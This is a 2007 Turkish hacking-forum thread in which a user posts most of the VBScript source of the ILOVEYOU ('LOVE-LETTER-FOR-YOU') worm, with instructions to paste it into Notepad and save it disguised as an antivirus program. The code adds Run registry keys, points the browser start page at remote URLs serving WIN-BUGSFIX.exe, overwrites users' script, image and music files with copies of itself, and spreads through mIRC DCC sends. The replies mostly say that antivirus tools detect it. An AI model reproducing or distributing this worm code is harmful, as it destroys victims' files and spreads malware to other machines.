THT DUYURU

chat
Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

ugursuz reklam
takipci
Seçenekler

Dünya'yı sallayan virüs

~R£N£W~ - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2007
Nereden:
Gövde Gösterisi
Mesajlar:
1.063
Konular:
347
Teşekkür (Etti):
101
Teşekkür (Aldı):
895
Ticaret:
(0) %
32
3074
14-08-2007 19:01
#1
s.a arkadaslar en bastan soyleyim kendı pcnızde denemyın
pcnız acılmaz.Açmak için format attıramassınız.Çünkü CD-ROM çalışmaz.CD-ROM u değiştirseniz bile nafile


Kod:


rem delete -pcaş(-vbe)
On es error -pc
On error Next Pc Hack
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Micros oft\Window s Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersio n\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersio n\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Micros oft\Intern et Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf 7679njbvYT /WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4j nHHGbvbmKL JKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGq**198vbFV5hfFEkbopBdQZnmPOhfgER67b3V bvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqweras djhPhjasfd glkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersio n\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="scri*t.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\scri*t.i ni")
scriptini.WriteLine "[scri*t]"
scriptini.WriteLine ";mIRC scri*t"
scriptini.WriteLine "; Please dont edit this scri*t... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0


kopyala not defterıne yapıstır sonra farklı kaydet fronten anti-virüs.bat olarak kaydedin kaydettikten sonra uzantısını (formatını) .exe olarak değiştirin.
--------------------- BiR naSihaT: KenDine diKKat eT.
BiR RiCa: SaKın DeğiŞme!
BiR DiLeK : BeNi uNuTma.
BiR YaLan : Seni Hiç SevMiYoRum.
BiR GeRÇek : Seni ÇoK özLüyoRum..





baris00 - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
08/2007
Mesajlar:
31
Konular:
1
Teşekkür (Etti):
0
Teşekkür (Aldı):
0
Ticaret:
(0) %
14-08-2007 21:34
#2
bu virüs yakalanıyor mu acaba ben yaptım ama yakalanmadı
alisahin - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
07/2007
Mesajlar:
163
Konular:
9
Teşekkür (Etti):
0
Teşekkür (Aldı):
3
Ticaret:
(0) %
14-08-2007 22:14
#3
tehlike...
speciall - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
08/2007
Mesajlar:
1
Konular:
0
Teşekkür (Etti):
0
Teşekkür (Aldı):
0
Ticaret:
(0) %
15-08-2007 14:49
#4
Elİne SaĞlik
~R£N£W~ - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2007
Nereden:
Gövde Gösterisi
Mesajlar:
1.063
Konular:
347
Teşekkür (Etti):
101
Teşekkür (Aldı):
895
Ticaret:
(0) %
17-08-2007 10:16
#5
nasılım?
--------------------- BiR naSihaT: KenDine diKKat eT.
BiR RiCa: SaKın DeğiŞme!
BiR DiLeK : BeNi uNuTma.
BiR YaLan : Seni Hiç SevMiYoRum.
BiR GeRÇek : Seni ÇoK özLüyoRum..





ardagider - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
08/2007
Nereden:
Edirne/İpsaLa
Mesajlar:
8
Konular:
0
Teşekkür (Etti):
0
Teşekkür (Aldı):
0
Ticaret:
(0) %
17-08-2007 17:14
#6
Kaspersky daha not defterinde yakaladı walla
68emrecanbulut68 - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
08/2007
Mesajlar:
8
Konular:
0
Teşekkür (Etti):
0
Teşekkür (Aldı):
0
Ticaret:
(0) %
23-08-2007 14:39
#7
nod 32 ben kodu tam yapıştır yaptıgım anda yakaladı
zerolax - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
06/2007
Mesajlar:
5
Konular:
1
Teşekkür (Etti):
0
Teşekkür (Aldı):
8
Ticaret:
(0) %
23-08-2007 17:17
#8
vay canına ama bir kurtulus var hard diski değiştirirseniz düzelmeşansı var eğer tabiki windows yüklü bir harddiski
frasine_anu - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
08/2007
Nereden:
muş
Yaş:
40
Mesajlar:
48
Konular:
0
Teşekkür (Etti):
0
Teşekkür (Aldı):
0
Ticaret:
(0) %
24-08-2007 11:24
#9
ben de kodu yazdım kaydetmeden daha yakaladı
frasine_anu - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
08/2007
Nereden:
muş
Yaş:
40
Mesajlar:
48
Konular:
0
Teşekkür (Etti):
0
Teşekkür (Aldı):
0
Ticaret:
(0) %
24-08-2007 11:35
#10
arkadaşlar ben birşey soracağım yardımcı olursanız sevinirim ben daha önce bir kaç kez I LOVE YOU virüsü başta olmak üzere kodlarını kaydettim dosya uzantısını değiştirdiğim yani txt den bat a çevirdiğim anda dosya kayboluyor neden oluyor bu

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler